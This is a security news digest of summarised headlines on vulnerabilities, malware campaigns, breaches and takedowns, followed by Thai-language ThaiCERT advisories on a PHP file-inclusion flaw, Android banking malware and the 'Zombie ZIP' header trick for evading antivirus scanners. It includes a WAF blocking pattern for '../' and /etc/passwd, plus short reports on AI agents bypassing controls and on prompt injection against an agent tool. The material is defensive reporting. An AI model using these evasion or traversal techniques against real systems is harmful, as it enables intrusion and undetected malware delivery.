• Stop Fixing OT Security With IT Thinking
  "In this Help Net Security interview, Ejona Preçi, Group CISO at Lindal Group, discusses the specific cybersecurity challenges in manufacturing environments. The conversation covers why standard IT security practices break down on shop floors, where PLCs and decade-old firmware were never designed to be networked. She explains how nation-state actors quietly settle into industrial networks, using stale accounts and compromised workstations to map environments without triggering alarms. She addresses patch management in OT, where production lines cannot simply be taken offline, and describes how security teams use compensating controls to manage risk without breaking operations."
  https://www.helpnetsecurity.com/2026/03/12/ejona-preci-lindal-group-ot-cybersecurity-manufacturing/

Vulnerabilities

• Veeam Warns Of Critical Flaws Exposing Backup Servers To RCE Attacks
  "Data protection company Veeam Software has patched multiple flaws in its Backup & Replication solution, including four critical remote code execution (RCE) vulnerabilities. VBR is enterprise data backup and recovery software that helps IT administrators to create copies of critical data for quick restoration following cyberattacks and hardware failures. Three RCE security flaws patched today (tracked as CVE-2026-21666, CVE-2026-21667, and CVE-2026-21669) allow low-privileged domain users to execute remote code on vulnerable backup servers in low-complexity attacks."
  https://www.bleepingcomputer.com/news/security/veeam-warns-of-critical-flaws-exposing-backup-servers-to-rce-attacks/
  https://www.veeam.com/kb4830
• A Major Security Flaw Could Affect 1 In 4 Android Phones - Here's How To Check Yours
  "A hardware security flaw found in many Android phones allowed white hat hackers to gain entry in under a minute, according to a new report. From there, they accessed sensitive user data, including messages and crypto wallet seed phrases. The flaw can be exploited by simply connecting an affected Android device to a laptop via a USB cable, according to a Wednesday report published by Donjon, the research division of crypto security hardware company Ledger. The phone's PIN could then be automatically brute-forced, its storage decrypted, and seed phrases from popular crypto wallets like Kraken Wallet and Phantom extracted."
  https://www.zdnet.com/article/security-flaw-affects-1-in-4-android-phones-how-to-check-yours/
  https://www.malwarebytes.com/blog/news/2026/03/this-android-vulnerability-can-break-your-lock-screen-in-under-60-seconds
• Splunk, Zoom Patch Severe Vulnerabilities
  "Splunk and Zoom this week announced security updates that resolve multiple critical- and high-severity vulnerabilities across their product portfolios. Zoom has addressed a critical-severity flaw in Workplace for Windows that could allow unauthenticated, remote attackers to elevate their privileges over the network. The issue impacts the Mail feature of the product and was addressed in Workplace for Windows version 6.6.0 and Workplace VDI Client for Windows versions 6.4.17, 6.5.15, and 6.6.10."
  https://www.securityweek.com/splunk-zoom-patch-severe-vulnerabilities/
• Cisco Patches High-Severity IOS XR Vulnerabilities
  "Cisco on Wednesday published its semiannual IOS XR software security advisory bundle, which includes three advisories detailing four high-severity vulnerabilities. The most severe of these issues are CVE-2026-20040 and CVE-2026-20046 (CVSS score of 8.8), two bugs that could be exploited to execute arbitrary commands as root or gain administrative control of a device. CVE-2026-20040 exists because user arguments passed to specific CLI commands are not sufficiently validated, allowing a low-privileged attacker to supply crafted commands at the prompt."
  https://www.securityweek.com/cisco-patches-high-severity-ios-xr-vulnerabilities-2/
  https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-privesc-bF8D5U4W
• Apple Patches Older iPhones And iPads Against Coruna Exploits
  "Apple has released security updates to patch older iPhones and iPads against a set of vulnerabilities targeted in cyberespionage and crypto-theft attacks using the Coruna exploit kit. Some of these security flaws have already been addressed in earlier updates for newer iOS device models, starting in September 2023. "This fix associated with the Coruna exploit," Apple said in security advisories released on Wednesday. "This update brings that fix to devices that cannot update to the latest iOS version,""
  https://www.bleepingcomputer.com/news/apple/apple-patches-older-iphones-and-ipads-against-coruna-exploits/
  https://thehackernews.com/2026/03/apple-issues-security-updates-for-older.html
  https://www.malwarebytes.com/blog/news/2026/03/apple-patches-coruna-exploit-kit-flaws-for-older-ios-versions
  https://securityaffairs.com/189362/security/apple-issues-emergency-fixes-for-coruna-flaws-in-older-ios-versions.html
  https://www.securityweek.com/apple-updates-older-ios-versions-to-patch-coruna-exploits/
• Microsoft Authenticator Could Leak Login Codes—update Your App Now
  "A vulnerability in Microsoft Authenticator for both iOS and Android (CVE-2026-26123) could leak your one-time sign-in codes or authentication deep links to a malicious app on the same device. Deep links are predefined URIs (Uniform Resource Identifiers) that allow direct access to an activity in a web or mobile application when clicked. In simple terms, they are specifically constructed links used to open an app and complete actions like signing in."
  https://www.malwarebytes.com/blog/news/2026/03/microsoft-authenticator-could-leak-login-codes-update-your-app-now
• China’s CERT Warns OpenClaw Can Inflict Nasty Wounds
  "China’s National Computer Network Emergency Response Technical Team has warned locals that the OpenClaw agentic AI tool poses significant security risks. In a Tuesday post to its WeChat account, the CERT warned that OpenClaw has “extremely weak default security configuration” and must therefore be handled with extreme care. The CERT is worried that attackers can target the tool by embedding malicious instructions in web pages, and that poisoned plugins for the agentic tool can put users at risk. China’s cyber-advisors also point out that OpenClaw has already disclosed several severe vulnerabilities that can result in credential theft and therefore enable serious attacks."
  https://www.theregister.com/2026/03/12/china_cert_openclaw_security_warning/

Malware

• A Slopoly Start To AI-Enhanced Ransomware Attacks
  "In early 2026, IBM X-Force discovered a likely AI-generated novel malware which we are dubbing “Slopoly,” used during a ransomware attack. The operators are part of a group tracked as Hive0163, whose main objective is extortion through large-scale data exfiltration and ransomware. Evidence of AI adoption among high-profile cybercrime groups signals the start of a fundamental shift of dynamics within the threat landscape. Although still relatively unspectacular, AI-generated malware such as Slopoly shows how easily threat actors can weaponize AI to develop new malware frameworks in a fraction of the time it used to take."
  https://www.ibm.com/think/x-force/slopoly-start-ai-enhanced-ransomware-attacks
  https://www.bleepingcomputer.com/news/security/ai-generated-slopoly-malware-used-in-interlock-ransomware-attack/
  https://thehackernews.com/2026/03/hive0163-uses-ai-assisted-slopoly.html
• Cyber Android RAT: Inside The Latest MaaS Being Sold On Underground Forums
  "The market for Android malware-as-a-service has grown dramatically in recent years, lowering the technical barrier for cybercriminals who want to surveil, defraud, or steal from mobile device users. Where sophisticated attacks once required custom development, today’s threat landscape is shaped by polished, commercially packaged tools sold openly to anyone willing to pay. Certo’s research team has identified a new and particularly capable entry into this market: a full-featured Android Remote Access Trojan (RAT) advertised on clear-web hacking forums under the name Cyber Android RAT, backed by a command-and-control platform called Cyber Nebula Core."
  https://www.certosoftware.com/insights/cyber-android-rat-inside-the-latest-maas-being-sold-on-underground-forums/
  https://www.bankinfosecurity.com/sophisticated-surveillance-rat-marketed-for-global-buyers-a-31005
• Inside The Tehran-Linked 'Faketivist' Hacking Group Handala
  "A Iranian hacking group that took credit for hacking a medical device manufacturer and a payment processing device maker has a history of wiper attacks, hack-and-leak campaigns and advancing Tehran's agenda through psychological operations. Going by the moniker "Handala," the group appears to be run out of Iran's Ministry of Intelligence, according to cybersecurity threat intel sources who track it under a variety of names, including Banished Kitten, Storm-0842 and Void Manticore."
  https://www.bankinfosecurity.com/inside-tehran-linked-faketivist-hacking-group-handala-a-31001
• Payment Giant Verifone Disputes Iranian Hacking Group Hit
  "A self-proclaimed hacktivist group widely suspected of being a front for Iranian intelligence claimed Wednesday to have hacked New York City-based payment device maker Verifone, saying it disrupted the organization's Israeli office and stole data. Verifone disputed the assertion. "Verifone has found no evidence of any incident related to this claim and has no service disruption to our clients," it said in a statement. The hacking claim comes from Handala, a group that cybersecurity experts say appears to be run by Iran's Ministry of Intelligence, in part to execute pro-Tehran psychological operations."
  https://www.bankinfosecurity.com/payment-giant-verifone-disputes-iranian-hacking-group-hit-a-30995
• Iranian MOIS Actors & The Cyber Crime Connection
  "For years, Iranian intelligence services have operated through deniable criminal intermediaries in the physical world. A similar pattern is now becoming visible in cyber space, where state objectives are increasingly pursued through criminal tools, services, and operational models. Notably, this dynamic appears with growing frequency in activity associated with actors linked to the Ministry of Intelligence and Security (MOIS). For a long time, Iranian actors sought to mask state activity behind the appearance of ordinary cyber crime, most often by posing as ransomware operators. The trend we are seeing now goes beyond imitation. Rather than simply adopting criminal and hacktivist personas to complicate attribution, some Iranian actors appear to be associating with the cyber criminal ecosystem itself, leveraging its malware, infrastructure, and affiliate-style mechanisms."
  https://research.checkpoint.com/2026/iranian-mois-actors-the-cyber-crime-connection/
  https://www.darkreading.com/threat-intelligence/iran-mois-criminals-cyberattacks
• SecuritySnack - CloudFlare Anti-Security For Phishing
  "Service platforms that provide protection and content delivery, like CloudFlare, have become a go-to for many web service hosts—including some malicious actors. These platforms offer inherent benefits like obfuscation, anti-bot, and anti-scanner tools. While excellent for defending legitimate customers, these very features can inadvertently shield malicious sites from proactive identification by security professionals and automated scanning services. This creates a challenging dynamic in the industry where a service provider's role in protecting its customer base competes with the broader community's need for effective security scanning. This report details a recent Microsoft 365 credential harvesting campaign that leverages this dynamic to delay detection and risk profiling."
  https://dti.domaintools.com/securitysnacks/securitysnack-cloudflare-anti-security-for-phishing
  https://hackread.com/hackers-cloudflare-human-check-microsoft-365-phishing/
• PixRevolution: The Agent-Operated Android Trojan Hijacking Brazil’s PIX Payments In Real Time
  "In 2020, the Central Bank of Brazil implemented an instant payment system called PIX that significantly reformed the local payment landscape, with over 76% of the population utilizing it for immediate transfers via smartphones. The zLabs team has identified a novel Android banking trojan specifically targeting this system and implicitly targeting most Brazilian financial institutions. This new strain of malware operates stealthily within the device until the moment the victim initiates a PIX transfer. The user inputs the desired amount, enters the payee’s PIX key, and selects the send option. A familiar loading indicator, “Aguarde…” (please wait)," is displayed. Subsequently, the screen confirms the transfer's completion; however, the funds are not routed to the intended payee. Instead, they are diverted to a criminal entity that has been monitoring the victim's screen in real time."
  https://zimperium.com/blog/pixrevolution-the-agent-operated-android-trojan-hijacking-brazils-pix-payments-in-real-time
  https://thehackernews.com/2026/03/six-android-malware-families-target-pix.html
  https://hackread.com/pixrevolution-malware-steals-brazil-pix-transfers/
  https://www.infosecurity-magazine.com/news/pixrevolution-malware-brazils-pix/
• China-Nexus Threat Actor Targets Persian Gulf Region With PlugX
  "On March 1, 2026, ThreatLabz observed new activity from a China-nexus threat actor targeting countries in the Persian Gulf region. The activity took place within the first 24 hours of the renewed conflict in the Middle East. The threat actor quickly weaponized the theme of the conflict, using an Arabic-language document lure depicting missile attacks for social engineering. The campaign used a multi-stage attack chain that ultimately deployed a PlugX backdoor variant. Based on the tools, techniques, and procedures (TTPs) observed, ThreatLabz attributes this activity to a China-nexus threat actor with high confidence, and assesses with medium confidence that it may be linked to Mustang Panda."
  https://www.zscaler.com/blogs/security-research/china-nexus-threat-actor-targets-persian-gulf-region-plugx
• How One Infostealer Infection Solved a Global Supply Chain Mystery And Unmasked DPRK Spies In U.S. Crypto
  "The global cybersecurity community has spent the past year unraveling the catastrophic Polyfill.io supply chain attack, an event that compromised over 100,000 websites globally. Until now, researchers could only attribute the attack to a shadowy Chinese entity named “Funnull” and its ties to transnational organized crime. The missing link was definitive attribution. That link has just been found. An exhaustive, forensic-level analysis of browsing history, credential dumps, and operational telemetry recovered from a compromised endpoint by Hudson Rock definitively links the Polyfill.io operator to state-sponsored cyber activities aligned with the Democratic People’s Republic of Korea (DPRK)."
  https://www.infostealers.com/article/how-one-infostealer-infection-solved-a-global-supply-chain-mystery-and-unmasked-dprk-spies-in-u-s-crypto/
  https://www.securityweek.com/polyfill-supply-chain-attack-impacting-100k-sites-linked-to-north-korea/
• VENON: The First Brazilian Banker RAT In Rust
  "In February 2026, the ZenoX threat intelligence team identified an unknown malware family during hunting activity, internally classified as VENON due to references in the code (spelled with an N). The sample was initially flagged for behavior consistent with Latin American banking trojans, particularly the use of banking overlays and active window monitoring, characteristics present in established families such as Grandoreiro and Mekotio. The fundamental difference emerged during static analysis: unlike all known families in the Latin American ecosystem, VENON does not contain a single line of Delphi code. The binary is compiled entirely in Rust, with 88 external dependencies identified from Crates."
  https://zenox.ai/en/venon-the-first-brazilian-banker-rat-in-rust/
  https://thehackernews.com/2026/03/rust-based-venon-malware-targets-33.html
• Rogue AI Agents Can Work Together To Hack Systems And Steal Secrets
  "AI agents work together to bypass security controls and stealthily steal sensitive data from within the enterprise systems in which they operate, according to tests carried out by frontier security lab Irregular. Although Irregular used some aggressive prompts that included urgent language to instruct agents to carry out assigned tasks, its experiments did not use any adversarial prompts that referenced security, hacking, or exploitation. All of the prompts and agents' responses are detailed in a Thursday report [PDF]."
  https://www.theregister.com/2026/03/12/rogue_ai_agents_worked_together/
  <https://irregular-public-docs.s3.eu-north-* **1.amazonaws.com/emergent_cyber_behavior_when_ai_agents_become_offensive_threat_actors.pdf>
• Insights: Increased Risk Of Wiper Attacks**
  "Unit 42 is tracking an increased risk of wiper attacks related to the conflict with Iran, including multiple related incidents impacting organizations in Israel and the US. For the latest intelligence on cyberattacks associated with this conflict, review our Threat Brief: March 2026 Escalation of Cyber Risk Related to Iran. The primary vector for recent destructive operations from the Handala Hack group (aka Void Manticore, COBALT MYSTIQUE and Storm-1084/Storm-0842) reportedly involves the exploitation of identity through phishing and administrative access through Microsoft Intune. Handala Hack first emerged in late 2023. Despite initial hacktivist-aligned messaging, the group is currently assessed by the threat intelligence community to be a state-directed front for Iran’s Ministry of Intelligence and Security (MOIS)."
  https://unit42.paloaltonetworks.com/handala-hack-wiper-attacks/
• Suspected China-Based Espionage Operation Against Military Targets In Southeast Asia
  "We identified a cluster of malicious activity targeting Southeast Asian military organizations, suspected with moderate confidence to be operating out of China. We designate this cluster as CL-STA-1087, with STA representing our assessment that the activity is conducted by state-sponsored actors. We traced this activity back to at least 2020. The activity demonstrated strategic operational patience and a focus on highly targeted intelligence collection, rather than bulk data theft. The attackers behind this cluster actively searched for and collected highly specific files concerning military capabilities, organizational structures and collaborative efforts with Western armed forces."
  https://origin-unit42.paloaltonetworks.com/espionage-campaign-against-military-targets/

Breaches/Hacks/Leaks

• Canadian Retail Giant Loblaw Notifies Customers Of Data Breach
  "Loblaw Companies Limited (Loblaw), the largest food and pharmacy retailer in Canada, announced that hackers breached a portion of its IT network and accessed basic customer information. The retailer has a nationwide network of 2,500 stores (franchise supermarkets, pharmacies, banking kiosks, and apparel shops) and plans to expand with 70 new ones this year as part of a five-year plan to invest $10 billion by 2030. The company employs 220,000 people and has an annual revenue of $45 billion. Its best-known commercial banners and brands are Loblaws, Real Canadian Superstore, No Frills, Maxi, President’s Choice, PC Optimum, and Joe Fresh."
  https://www.bleepingcomputer.com/news/security/canadian-retail-giant-loblaw-notifies-customers-of-data-breach/
• England Hockey Investigating Ransomware Data Breach
  "England Hockey, the governing body for field hockey in England, is investigating a potential data breach after the AiLock ransomware gang listed it as a victim on its data leak site. The threat actor allegedly stole 129GB of data from the organization’s systems and announced that it will soon publish the files, unless a ransom is paid. England Hockey is aware of the threat actor’s claims and has prioritized an inquiry that involves both internal teams and external experts to determine what happened."
  https://www.bleepingcomputer.com/news/security/england-hockey-investigating-ransomware-data-breach/
• Telus Digital Confirms Breach After Hacker Claims 1 Petabyte Data Theft
  "Canadian business process outsourcing giant Telus Digital has confirmed it suffered a security incident after threat actors claimed to have stolen nearly 1 petabyte of data from the company in a multi-month breach. Telus Digital is the digital services and business process outsourcing (BPO) arm of Canadian telecommunications provider Telus, providing customer support, content moderation, AI data services, and other outsourced operational services to companies worldwide."
  https://www.bleepingcomputer.com/news/security/telus-digital-confirms-breach-after-hacker-claims-1-petabyte-data-theft/

General News

• Authorities Dismantle Global Malicious Proxy Service That Deployed Malware And Defrauded Thousands Of U.S. Persons, Businesses, And Financial Institutions Of Millions Of Dollars In Losses
  "Yesterday a court-authorized international law enforcement operation led by the U.S. Justice Department disrupted SocksEscort, a residential proxy network used to exploit thousands of residential routers worldwide and commit large-scale fraud. The U.S. government executed seizure warrants against a few dozen U.S.-registered internet domains allegedly engaged in the cyber-enabled criminal activity, U.S. Attorney Eric Grant announced. According to court documents, SocksEscort infected home and small business internet routers with malware. The malware allowed SocksEscort to direct internet traffic through the infected routers. SocksEscort sold this access to its customers."
  https://www.justice.gov/usao-edca/pr/authorities-dismantle-global-malicious-proxy-service-deployed-malware-and-defrauded
  https://www.bleepingcomputer.com/news/security/us-disrupts-socksescort-proxy-network-powered-by-linux-malware/
  https://therecord.media/us-europol-disrupt-socksescort-network
  https://cyberscoop.com/socksescort-proxy-network-botnet-takedown/
  https://hackread.com/feds-dismantle-socksescort-proxy-network-fraud/
  https://www.theregister.com/2026/03/12/socksescort_fraud_proxy_taken_down_fbi/
• US Charges Another Ransomware Negotiator Linked To BlackCat Attacks
  "The U.S. Department of Justice charged another former DigitalMint employee for his involvement in an insider scheme in which ransomware negotiators secretly partnered with the BlackCat (ALPHV) ransomware operation. Angelo Martino has been charged with one count of conspiracy to interfere with interstate commerce by extortion after surrendering to the U.S. Marshals on March 10."
  https://www.bleepingcomputer.com/news/security/us-charges-another-ransomware-negotiator-linked-to-blackcat-attacks/
• ENISA Technical Advisory For Secure Use Of Package Managers
  "This document focuses on how developers can securely use package managers as part of their software development life cycle. In particular, this document, outlines common risks involved in the use of third-party packages, presents secure practices for selecting, integrating, and monitoring packages and describes approaches for addressing vulnerabilities found in dependencies."
  https://www.enisa.europa.eu/publications/enisa-technical-advisory-for-secure-use-of-package-managers
  https://www.enisa.europa.eu/sites/default/files/2026-03/ENISA Technical Advisory - Package_Managers_Final.pdf
  https://securityaffairs.com/189333/security/enisa-technical-advisory-on-secure-package-managers-essential-devsecops-guidance.html
  https://www.helpnetsecurity.com/2026/03/12/enisa-package-manager-security-technical-advisory/
• Wireless Vulnerabilities Are Doubling Every Few Years
  "Wireless vulnerabilities are being disclosed at a rate that has no precedent in the fifteen-year history of systematic tracking. In 2025, researchers published 937 new wireless-related CVEs, an average of 2.5 per day, according to a threat report from Bastille Networks based on data from the NIST National Vulnerability Database. The wireless CVE category has expanded from 4 disclosures in 2010 to 932 in 2025, a 230× increase. When indexed against the same 2010 baseline, wireless disclosures have grown at more than 20 times the rate of total CVE disclosures across all technology categories. Wireless CVEs now account for nearly 2% of all annual disclosures."
  https://www.helpnetsecurity.com/2026/03/12/report-wireless-security-vulnerabilities-2026/
  The Human IOC: Why Security Professionals Struggle With Social Vetting
  "During my years working in Security Operations, we were very careful to vet anything that came our way. We vetted sources, intelligence, IOCs, TTPs (tactics, techniques, and procedures), and other information as well. The reason for this was straightforward. Leveraging anything that was not properly vetted could result in serious consequences."
  https://www.securityweek.com/the-human-ioc-why-security-professionals-struggle-with-social-vetting/
• US Sanctions North Korea IT Worker Networks In Laos, Vietnam
  "The U.S. Treasury Department sanctioned six people and two companies for their work supporting the North Korean IT worker scheme in multiple countries. The latest round of sanctions targeted Amnokgang Technology Development Company — a North Korean company that manages delegations of IT workers — and Quangvietdnbg International Services Company — a Vietnamese firm used by North Korean actors for currency conversion services. The Treasury Department said Quangvietdnbg converted about $2.5 million for Amnokgang between 2023 and 2025."
  https://therecord.media/us-sanctions-north-korea-it-worker-networks-laos-vietnam
• Navigating 2026’s Converged Threats: Insights From Flashpoint’s Global Threat Intelligence Report
  "The cybersecurity landscape has reached a point of total convergence, where the silos that once separated malware, identity, and infrastructure have collapsed into a single, high-velocity threat engine. Simultaneously, the threat landscape is shifting from human-led attacks to machine-speed operations as a result of agentic AI, which acts as a force multiplier for the modern adversary."
  https://flashpoint.io/blog/global-threat-intelligence-report-2026/
  https://www.helpnetsecurity.com/2026/03/12/agentic-attack-chains-infostealers-criminal-markets/
• Proactive Preparation And Hardening Against Destructive Attacks: 2026 Edition
  "Threat actors leverage destructive malware to destroy data, eliminate evidence of malicious activity, or manipulate systems in a way that renders them inoperable. Destructive cyberattacks can be a powerful means to achieve strategic or tactical objectives; however, the risk of reprisal is likely to limit the frequency of use to very select incidents. Destructive cyberattacks can include destructive malware, wipers, or modified ransomware."
  https://cloud.google.com/blog/topics/threat-intelligence/preparation-hardening-destructive-attacks
• Cyber Fallout From The Iran War: What To Have On Your Radar
  "The war in Iran was less than 24 hours old when it produced a historic first: the deliberate targeting of commercial data centers. On March 1st, Iranian drones hit three Amazon Web Services (AWS) facilities in the United Arab Emirates and Bahrain, disrupting core cloud infrastructure and knocking out finance apps and enterprise tools not only across the Gulf, but also far away from the region. The attacks showed that physical distance from a conflict zone is no guarantee of insulation from the impacts of kinetic warfare."
  https://www.welivesecurity.com/en/business-security/cyber-fallout-iran-war-what-have-radar/

อ้างอิง
Electronic Transactions Development Agency (ETDA)

1.รายละเอียดช่องโหว่
พบช่องโหว่ Local File Inclusion (LFI) หมายเลข CVE-2026-3826 (CVSS v3.1: 9.8 ) ช่องโหว่นี้พบในฟังก์ชัน Include/Require ของภาษา PHP ในซอฟต์แวร์บริหารจัดการคลังสินค้า IFTOP (Inventory & Task Optimization Platform) ของ WellChoose ซึ่งอาจเปิดโอกาสให้ผู้โจมตีจากระยะไกลที่ไม่ได้รับการยืนยันตัวตนสามารถเข้าถึงไฟล์ภายในระบบ รันโค้ดอันตราย หรือเข้าถึงข้อมูลสำคัญภายในระบบคลังสินค้าได้ [2]

2.ลักษณะการโจมตี
เกิดจากการที่ระบบขาดการตรวจสอบชื่อไฟล์ (CWE-98) ทำให้ผู้โจมตีสามารถแทรกเส้นทางไฟล์ (Path Traversal) เพื่ออ่านไฟล์สำคัญในระบบ หรือหลอกให้เซิร์ฟเวอร์รันโค้ดอันตรายจากภายนอก (Remote Code Execution) ได้ [3]

3.ผลิตภัณฑ์ที่ได้รับผลกระทบ

• IFTOP (Inventory & Task Optimization Platform)

4.แนวทางการแก้ไขสำหรับผู้ดูแลระบบคลังสินค้ายี่ห้อ WellChoose [4]
4.1 อัปเดตแพตช์ด่วน ให้เป็นเวอร์ชันล่าสุดที่ได้รับการแก้ไขช่องโหว่แล้ว
4.2 ตรวจสอบไฟล์ php.ini และตั้งค่า allow_url_include = Off เพื่อลดความเสี่ยงในการถูกโจมตีจากระยะไกล
4.3 จำกัดสิทธิ์การเข้าถึงไฟล์ (File Permissions) ให้เว็บเซิร์ฟเวอร์เข้าถึงได้เฉพาะไดเรกทอรีที่จำเป็นเท่านั้น
4.4 แยกส่วนเซิร์ฟเวอร์ที่รันระบบ IFTOP ออกจากเครือข่ายอินเทอร์เน็ตสาธารณะ และเข้าถึงผ่าน VPN หรือระบบที่ต้องยืนยันตัวตนหลายชั้น (MFA) เท่านั้น

5. หากยังไม่สามารถอัปเดตได้ ควรดำเนินการดังนี้
   5.1 ใช้ Web Application Firewall (WAF) ในการตรวจจับและบล็อกการส่งค่า Parameter ที่มีลักษณะเป็น ../ หรือชื่อไฟล์ระบบ (เช่น /etc/passwd)
   5.2 จำกัดการเข้าถึงหน้า Management Interface ให้เฉพาะหมายเลข IP (Allow List) ของเจ้าหน้าที่ในคลังสินค้าเท่านั้น
   5.3 ตรวจสอบ Log ของเว็บเซิร์ฟเวอร์เพื่อหาความพยายามในการเรียกไฟล์ที่ผิดปกติอย่างสม่ำเสมอ

ThaiCERT เตือนอย่าปล่อยให้ช่องโหว่ในระบบคลังสินค้า กลายเป็นช่องทางให้ระบบหยุดชะงัก!

#CyberSecurity #CVE20263826 #IFTOP #WellChoose #WarehouseManagement #SmartLogistics #ThaiCERT #Alert #LFI #VulnerabilityManagement #ความปลอดภัยทางไซเบอร์ #ระบบคลังสินค้า

อ้างอิง
[1] https://radar.offseq.com/threat/cve-2026-3826-cwe-98-improper-control-of-filename--e68c5a28
[2] https://nvd.nist.gov/vuln/detail/CVE-2026-3826
[3] https://www.twcert.org.tw/en/cp-139-10756-73f66-2.html
[4] https://cwe.mitre.org/data/definitions/98.html

1.รูปแบบและลักษณะการโจมตี (Attack Vector)
มัลแวร์ดังกล่าวมีลักษณะเป็นภัยคุกคามแบบผสมผสาน (Hybrid Threat) ดังนี้
1.1 มัลแวร์ทำการดักจับข้อมูลการเข้าสู่ระบบแอปพลิเคชันธนาคาร (Mobile Banking) รวมถึงดักอ่านรหัสผ่านใช้ครั้งเดียว (OTP) จากข้อความ SMS เพื่อนำไปกระทำการทุจริตธุรกรรมทางการเงิน
1.2 มัลแวร์สามารถสั่งการให้หน่วยประมวลผล (CPU) ทำงานอย่างหนักเพื่อขุดสกุลเงินดิจิทัล ส่งผลให้อุปกรณ์มีอุณหภูมิสูงขึ้น ประสิทธิภาพการทำงานลดลง และแบตเตอรี่เสื่อมสภาพก่อนกำหนด

2.สัญญาณเตือนว่าอุปกรณ์อาจถูกมัลแวร์โจมตี ได้แก่
2.1 อุปกรณ์มีอุณหภูมิสูงกว่าปกติอย่างต่อเนื่อง แม้ในขณะที่ไม่ได้ใช้งานหนัก
2.2 แบตเตอรี่มีอัตราการลดลงที่รวดเร็วผิดปกติ (Battery Drain)
2.3 ระบบปฏิบัติการทำงานล่าช้า มีอาการค้าง หรือแอปพลิเคชันปิดตัวลงเองบ่อยครั้ง
2.4 ปรากฏแอปพลิเคชันที่ไม่รู้จัก หรือมีหน้าต่าง Pop-up ขออนุมัติสิทธิ์ (Permissions) ซ้ำๆ โดยไม่มีสาเหตุ

3.มาตรการรับมือ (Incident Response)
3.1 ตัดการเชื่อมต่อเครือข่าย ปิดสัญญาณ Wi-Fi และข้อมูลมือถือทันที เพื่อระงับการรับส่งข้อมูลกับเครื่องแม่ข่ายของผู้ไม่หวังดี
3.2 ถอนการติดตั้งแอปพลิเคชัน ตรวจสอบและลบแอปพลิเคชันที่น่าสงสัย (หากลบไม่ได้ตามปกติ ให้ดำเนินการผ่านโหมดปลอดภัย หรือ Safe Mode)
3.3 ติดต่อธนาคารเจ้าของบัญชีทันทีเพื่อตรวจสอบความเคลื่อนไหว และพิจารณาอายัดบัญชีหรือเปลี่ยนรหัสผ่านหากจำเป็น
3.4 แจ้งผู้ดูแลระบบของหน่วยงาน(กรณีเครื่องใช้ในการปฏิบัติงาน) เพื่อป้องกันการแพร่กระจายเข้าสู่เครือข่ายหน่วยงาน

4.แนวทางปฏิบัติเพื่อการป้องกัน ดังนี้[2]
4.1 ติดตั้งแอปพลิเคชันจากแหล่งที่เชื่อถือได้ ดาวน์โหลดผ่าน Google Play Store เท่านั้น และหลีกเลี่ยงการติดตั้งไฟล์ประเภท .apk จากแหล่งภายนอกหรือลิงก์ส่งต่อ
4.2 ตรวจสอบสิทธิ์การเข้าถึง (Accessibility Service) ตรวจสอบที่เมนู Settings > Accessibility หากพบแอปพลิเคชันที่ไม่รู้จักได้รับสิทธิ์ ให้รีบทำการปิดสิทธิ์และถอนการติดตั้งทันที
4.3 เปิดใช้งาน Google Play Protect เพื่อให้ระบบทำการสแกนตรวจสอบแอปพลิเคชันที่เป็นอันตรายโดยอัตโนมัติ
4.4 หมั่นอัปเดตระบบปฏิบัติการและแอปพลิเคชันให้เป็นเวอร์ชันล่าสุดเพื่อปิดช่องโหว่ด้านความปลอดภัย

ขอให้ผู้ใช้งานเช็คการใช้งานอุปกรณ์ และติดตั้งแอปพลิเคชันจากแหล่งที่เชื่อถือได้เท่านั้น เพื่อลดความเสี่ยงจากภัยคุกคามทางไซเบอร์

อ้างอิง
[1]https://dg.th/wp6fz4ned2
[2]https://dg.th/a4rdb0w28m

#ThaiCERT #CyberSecurity #แจ้งเตือนภัยไซเบอร์ #มัลแวร์อันตราย #BeatBanker #StarlinkApp #เตือนภัยแอปปลอม #AndroidSafety #CyberSafety

1. รายละเอียดของเทคนิค

นักวิจัยด้านความปลอดภัยจากบริษัท Bombadil Systems ได้เผยแพร่เทคนิครูปแบบใหม่ ชื่อว่า “Zombie ZIP” ซึ่งเป็นวิธีการดัดแปลงโครงสร้างของไฟล์ ZIP ให้ข้อมูลใน header ไม่สอดคล้องกับข้อมูลจริงภายในไฟล์ เช่น การกำหนดค่า Compression Method เป็น STORED (0) ซึ่งหมายถึงข้อมูลไม่ได้ถูกบีบอัด ทั้งที่ข้อมูลจริงถูกบีบอัดด้วยอัลกอริทึม DEFLATE ส่งผลให้ระบบ Antivirus หรือ Endpoint Detection and Response (EDR) ที่อาศัยข้อมูลใน header ในการประมวลผลไฟล์ ทำการสแกนข้อมูลแบบ raw bytes โดยไม่ทำการคลายการบีบอัดก่อน จึงอาจไม่สามารถตรวจพบ payload ที่ซ่อนอยู่ภายในไฟล์ได้ [1]

เทคนิคดังกล่าวได้รับการกำหนดรหัสช่องโหว่เป็น CVE-2026-0866 และมีการเผยแพร่บันทึกช่องโหว่โดย CERT Coordination Center ภายใต้หมายเลข VU#976247 [2]

ทั้งนี้ลักษณะของช่องโหว่ดังกล่าวมีความคล้ายคลึงกับช่องโหว่ CVE-2004-0935 (VU#968818) ซึ่งเกี่ยวข้องกับการใช้ไฟล์ ZIP ที่มีโครงสร้างผิดปกติเพื่อหลบเลี่ยงการตรวจจับของโปรแกรม Antivirus โดยอาศัยการที่ระบบตรวจสอบไฟล์เชื่อถือข้อมูล metadata ภายใน archive มากเกินไป ทำให้ไม่สามารถวิเคราะห์เนื้อหาที่แท้จริงภายในไฟล์ได้อย่างถูกต้อง [3]

2. กลไกการทำงานทางเทคนิคของ Zombie ZIP

การทดสอบโดยนักวิจัยบนแพลตฟอร์ม VirusTotal พบว่าไฟล์ที่สร้างด้วยเทคนิค Zombie ZIP สามารถหลบเลี่ยงการตรวจจับของโปรแกรมป้องกันไวรัสได้ในอัตราสูง โดยไฟล์ตัวอย่างที่มี payload เดียวกัน เมื่อบรรจุอยู่ในไฟล์ ZIP ปกติ ไฟล์ดังกล่าวสามารถถูกตรวจจับได้โดยระบบตรวจจับมัลแวร์มากกว่า 50 ระบบ แต่เมื่อมีการดัดแปลง header ให้เป็น Zombie ZIP กลับถูกตรวจจับได้เพียง 1 ระบบ จากระบบตรวจจับมัลแวร์มากกว่า 50 ระบบ ทั้งนี้ เครื่องมือแตกไฟล์ทั่วไป เช่น 7-Zip หรือ WinRAR มักจะแสดงข้อผิดพลาดหรือไม่สามารถแตกไฟล์ได้อย่างสมบูรณ์ เนื่องจากค่า compression method และค่า CRC ไม่สอดคล้องกับข้อมูลจริงภายในไฟล์ [4]

3. โปรแกรม Antivirus ที่ได้รับผลกระทบจากเทคนิคของ Zombie ZIP

3.1 Microsoft (Microsoft Defender)
3.2 Avast
3.3 Bitdefender
3.4 ESET
